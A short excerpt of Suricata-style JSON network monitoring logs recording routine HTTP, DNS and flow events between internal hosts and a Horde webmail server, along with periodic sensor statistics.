{"timestamp":"2020-02-29T00:19:58.971477+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461},"app_proto":"http","fileinfo":{"filename":"\/js\/identityselect.js","state":"CLOSED","stored":false,"size":983,"tx_id":11}} {"timestamp":"2020-02-29T00:19:58.971771+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117}} {"timestamp":"2020-02-29T00:19:59.000281+0000","event_type":"stats","stats":{"uptime":14851,"capture":{"kernel_packets":137189,"kernel_drops":0},"decoder":{"pkts":137198,"bytes":94135989,"invalid":192,"ipv4":135655,"ipv6":10,"ethernet":137198,"raw":0,"null":0,"sll":0,"tcp":130176,"udp":5272,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2830,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2846,"synack":2837,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1867,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2413,"failed_udp":112},"tx":{"http":4783,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2495}},"flow_mgr":{"closed_pruned":2803,"new_pruned":17,"est_pruned":2466,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65532,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21167,"memcap_state":0,"memcap_global":0},"http":{"memuse":110192,"memcap":0}}} {"timestamp":"2020-02-29T00:20:01.647446+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34890,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=kNRoyzspsLUkqfA8aZJfxcp&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3343},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":8574,"tx_id":1}} {"timestamp":"2020-02-29T00:20:02.578245+0000","flow_id":784388504545285,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34892,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":78,"tx_id":0}} {"timestamp":"2020-02-29T00:20:03.976837+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-delete.png","state":"CLOSED","stored":false,"size":117,"tx_id":12}} {"timestamp":"2020-02-29T00:20:04.468667+0000","flow_id":811820461074107,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62219,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:04.579983+0000","flow_id":811820461074107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53750,"proto":"UDP","dns":{"type":"answer","id":62219,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:04.579983+0000","flow_id":811820461074107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53750,"proto":"UDP","dns":{"type":"answer","id":62219,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:05.093693+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":233,"tx_id":0}} {"timestamp":"2020-02-29T00:20:05.103615+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4382}} {"timestamp":"2020-02-29T00:20:05.261009+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52922,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4382},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20182,"tx_id":0}} {"timestamp":"2020-02-29T00:20:05.262166+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469}} {"timestamp":"2020-02-29T00:20:06.000228+0000","event_type":"stats","stats":{"uptime":14858,"capture":{"kernel_packets":137242,"kernel_drops":0},"decoder":{"pkts":137243,"bytes":94148933,"invalid":192,"ipv4":135700,"ipv6":10,"ethernet":137243,"raw":0,"null":0,"sll":0,"tcp":130215,"udp":5278,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2832,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2848,"synack":2839,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1868,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2416,"failed_udp":112},"tx":{"http":4788,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2498}},"flow_mgr":{"closed_pruned":2803,"new_pruned":17,"est_pruned":2466,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21497,"memcap_state":0,"memcap_global":0},"http":{"memuse":54359,"memcap":0}}} {"timestamp":"2020-02-29T00:20:09.000660+0000","flow_id":347324023631198,"event_type":"flow","src_ip":"192.168.10.122","src_port":49690,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:08.716126+0000","end":"2020-02-29T00:15:08.826187+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:10.000688+0000","flow_id":1067809082562313,"event_type":"flow","src_ip":"192.168.10.122","src_port":34810,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:09.186121+0000","end":"2020-02-29T00:15:09.294351+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:10.002024+0000","flow_id":376680125051247,"event_type":"flow","src_ip":"192.168.10.122","src_port":34528,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:08.930159+0000","end":"2020-02-29T00:15:09.038527+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:10.267171+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52922,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/success.png","state":"CLOSED","stored":false,"size":469,"tx_id":1}} {"timestamp":"2020-02-29T00:20:11.000774+0000","flow_id":1222994856334552,"event_type":"flow","src_ip":"192.168.10.130","src_port":34880,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1167,"bytes_toclient":643,"start":"2020-02-29T00:19:05.218328+0000","end":"2020-02-29T00:19:10.359486+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:13.000141+0000","event_type":"stats","stats":{"uptime":14865,"capture":{"kernel_packets":137255,"kernel_drops":0},"decoder":{"pkts":137258,"bytes":94155456,"invalid":192,"ipv4":135715,"ipv6":10,"ethernet":137258,"raw":0,"null":0,"sll":0,"tcp":130230,"udp":5278,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2832,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2848,"synack":2839,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1869,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2416,"failed_udp":112},"tx":{"http":4789,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2498}},"flow_mgr":{"closed_pruned":2804,"new_pruned":17,"est_pruned":2469,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20504,"memcap_state":0,"memcap_global":0},"http":{"memuse":19654,"memcap":0}}} {"timestamp":"2020-02-29T00:20:13.001735+0000","flow_id":148136325567662,"event_type":"flow","src_ip":"192.168.10.122","src_port":45317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:12.611502+0000","end":"2020-02-29T00:15:12.719590+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:13.602993+0000","flow_id":2114307948884849,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38148,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62318,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:13.714116+0000","flow_id":2114307948884849,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38148,"proto":"UDP","dns":{"type":"answer","id":62318,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:13.714116+0000","flow_id":2114307948884849,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38148,"proto":"UDP","dns":{"type":"answer","id":62318,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:13.773965+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423}} {"timestamp":"2020-02-29T00:20:14.000659+0000","flow_id":1624213506063863,"event_type":"flow","src_ip":"192.168.10.122","src_port":43745,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:13.425463+0000","end":"2020-02-29T00:15:13.533751+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:14.000956+0000","flow_id":104855940204179,"event_type":"flow","src_ip":"192.168.10.122","src_port":50670,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:13.624275+0000","end":"2020-02-29T00:15:13.729610+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:14.001088+0000","flow_id":978800180569870,"event_type":"flow","src_ip":"192.168.10.122","src_port":50520,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:13.763662+0000","end":"2020-02-29T00:15:13.872716+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:16.652632+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":0}} {"timestamp":"2020-02-29T00:20:16.662657+0000","flow_id":80645229386881,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55639,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62642,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:16.774063+0000","flow_id":80645229386881,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55639,"proto":"UDP","dns":{"type":"answer","id":62642,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:16.774063+0000","flow_id":80645229386881,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55639,"proto":"UDP","dns":{"type":"answer","id":62642,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:16.879486+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799}} {"timestamp":"2020-02-29T00:20:16.925711+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20554,"tx_id":1}} {"timestamp":"2020-02-29T00:20:16.928813+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951}} {"timestamp":"2020-02-29T00:20:16.930401+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633}} {"timestamp":"2020-02-29T00:20:16.980134+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52926,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/basic\/screen.css","state":"CLOSED","stored":false,"size":6255,"tx_id":0}} {"timestamp":"2020-02-29T00:20:16.980407+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103}} {"timestamp":"2020-02-29T00:20:16.982215+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52926,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-center-active.png","state":"CLOSED","stored":false,"size":103,"tx_id":1}} {"timestamp":"2020-02-29T00:20:16.983390+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":12657,"tx_id":2}} {"timestamp":"2020-02-29T00:20:16.983592+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179}} {"timestamp":"2020-02-29T00:20:17.025464+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161}} {"timestamp":"2020-02-29T00:20:17.064556+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-left-active.png","state":"CLOSED","stored":false,"size":179,"tx_id":3}} {"timestamp":"2020-02-29T00:20:17.064917+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:20:18.000801+0000","flow_id":1152402773196756,"event_type":"flow","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":34,"pkts_toclient":39,"bytes_toserver":4542,"bytes_toclient":40700,"start":"2020-02-29T00:18:55.933844+0000","end":"2020-02-29T00:19:17.296921+0000","age":22,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 